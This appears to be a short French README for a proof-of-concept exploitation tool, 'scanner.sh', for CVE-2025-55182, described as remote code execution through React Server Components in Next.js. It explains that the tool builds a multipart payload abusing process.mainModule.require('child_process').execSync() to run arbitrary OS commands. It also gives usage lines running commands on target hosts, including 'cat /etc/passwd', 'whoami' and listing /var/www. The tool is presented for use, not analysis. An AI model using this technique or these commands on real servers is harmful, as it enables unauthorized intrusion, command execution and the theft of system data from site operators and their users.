
POC-CVE-2025-55182
CVE-2025-55182 Scanner Avancé
Un utilitaire d'exploitation complet pour CVE-2025-55182 — Exécution de code à distance via les composants serveur React dans Next.js. Le scanner crée automatiquement la charge utile multipart et abuse de process.mainModule.require('child_process').execSync() pour exécuter des commandes OS arbitraires sur des instances vulnérables.
Fonctionnalités
Installation chmod +x scanner.sh
Utilisation
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
Options

Exemples
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
N'hésitez pas à me contacter sur mailto:[email protected]